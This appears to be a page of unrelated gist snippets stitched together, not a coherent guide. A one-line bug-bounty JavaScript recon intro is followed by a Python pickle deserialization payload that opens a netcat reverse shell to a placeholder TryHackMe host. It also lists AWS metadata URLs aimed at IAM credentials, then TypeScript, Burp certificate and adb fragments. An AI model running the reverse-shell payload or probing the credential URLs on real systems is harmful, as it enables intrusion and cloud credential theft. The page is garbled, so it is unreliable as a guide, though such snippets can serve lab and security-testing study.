This is a simple guide to perform javascript recon in the bugbounty
- The first step is to collect possibly several javascript files (
more files
=more paths,parameters
->more vulns
)
import pickle | |
import sys | |
import base64 | |
command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat YOUR_TRYHACKME_VPN_IP 4444 > /tmp/f' | |
class rce(object): | |
def __reduce__(self): | |
import os | |
return (os.system,(command,)) |
## AWS | |
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
http://169.254.169.254/latest/user-data | |
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/ami-id | |
http://169.254.169.254/latest/meta-data/reservation-id | |
http://169.254.169.254/latest/meta-data/hostname | |
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
// Basic Types | |
let id: number = 5 | |
let company: string = 'Traversy Media' | |
let isPublished: boolean = true | |
let x: any = 'Hello' | |
let ids: number[] = [1, 2, 3, 4, 5] | |
let arr: any[] = [1, true, 'Hello'] | |
// Tuple |
To do so: | |
1. Export your Burp Certificate | |
Proxy > Options > CA Certificate > Export in DER format | |
2. Convert it to PEM | |
openssl x509 -inform der -in cacert.der -out burp.pem | |
3. Download it on the device |
adb help // List all comands | |
== Adb Server | |
adb kill-server | |
adb start-server | |
== Adb Reboot | |
adb reboot | |
adb reboot recovery | |
adb reboot-bootloader |